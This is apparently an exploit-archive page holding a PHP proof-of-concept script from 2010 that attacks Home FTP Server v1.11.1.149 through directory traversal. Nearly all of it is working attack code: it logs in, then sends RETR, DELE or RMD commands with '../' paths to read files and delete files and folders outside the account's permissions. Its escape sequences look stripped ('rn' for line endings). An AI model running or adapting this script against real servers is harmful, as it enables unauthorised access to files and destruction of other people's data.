[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Home FTP Server v1.11.1.149 RETR DELE RMD Remote Directory Traversal Exploit
# Published : 2010-10-30
# Author : Pr0T3cT10n
# Previous Title : SmallFTPD v1.0.3 Remote Directory Traversal Vulnerability
# Next Title : Android 2.0-2.1 Reverse Shell Exploit
<?php
# _ ____ __ __ ___
# (_)____ _ __/ __ / /_____ ____/ / _/_/ |
# / // __ | / / / / / //_/ _ / __ / / / / /
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
# /_//_/ /_/|___/____/_/|_|___/__,_/ / /_/_/
# Live by the byte |_/_/
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
# The following is a proof of concept exploit for a path traversal vulnerability that exists in Home FTP Server.
# The vulnerability allows an unprivileged attacker to read files and delete files & folders whom he has no permissions to.
# The vulnerable FTP commands are:
# * RETR - Read File
# * DELE - Delete File
# * RMD - Remove Directory
#-----------------------------------
# Exploit Title: Home FTP Server v1.11.1.149 Remote Directory Traversal Exploit
# Date: 31/10/2010
# Author: Pr0T3cT10n
# Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe
# Affected Version: 1.11.1.149
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
###
error_reporting(E_ALL);
if(count($argv) <= 4) {
echo("rn# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]rn");
echo("tHOST - An host using Home FTP Serverrn");
echo("tPORT - Default is 21rn");
echo("tUSER - Usernamern");
echo("tPASS - Passwordrn");
exit("rn");
} else {
$CMD = '';
$CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]);
$sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5);
if($sock) {
echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}rn");
$read = fread($sock, 1024);
fwrite($sock, "USER {$CFG['user']}rn");
$read = fread($sock, 1024);
fwrite($sock, "PASS {$CFG['pass']}rn");
$read = fread($sock, 1024);
echo("(~) What would you like to do?rnt1.Remove Filernt2.Remove Directoryrnt3.Read Filern");
$CHSE = rtrim(fgets(STDIN));
if($CHSE == 1) {
$CMD.= "DELE";
echo("(~) Path to file(for example: ../../../test.txt): ");
$PATH = rtrim(fgets(STDIN));
if($PATH != '') {
fwrite($sock, "{$CMD} {$PATH}rn");
echo(fread($sock, 1024));
} else {
exit("(-) Empty path.rn");
}
} elseif($CHSE == 2) {
$CMD.= "RMD";
echo("(~) Path to directory(for example: ../../../test): ");
$PATH = rtrim(fgets(STDIN));
if($PATH != '') {
fwrite($sock, "{$CMD} {$PATH}rn");
echo(fread($sock, 1024));
} else {
exit("(-) Empty path.rn");
}
} elseif($CHSE == 3) {
$CMD.= "RETR";
echo("(~) Path to file(for example: ../../../test.txt): ");
$PATH = rtrim(fgets(STDIN));
if($PATH != '') {
fwrite($sock, "PASVrn");
$read = fread($sock, 1024);
$xpld = explode(',', $read);
$addr_tmp = explode('(', $xpld[0]);
$address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}";
$port_tmp = explode(')', $xpld[5]);
$newport = ($xpld[4]*256)+$port_tmp[0];
fwrite($sock, "{$CMD} {$PATH}rn");
$read = fread($sock, 1024);
$socket = fsockopen($address, $newport, $errno, $errstr, 5);
if($socket) {
echo(fread($socket, 1024));
}
} else {
exit("(-) Empty path.rn");
}
} else {
exit("(-) You have to choose correctly.rn");
}
} else {
exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}rn");
}
}
?>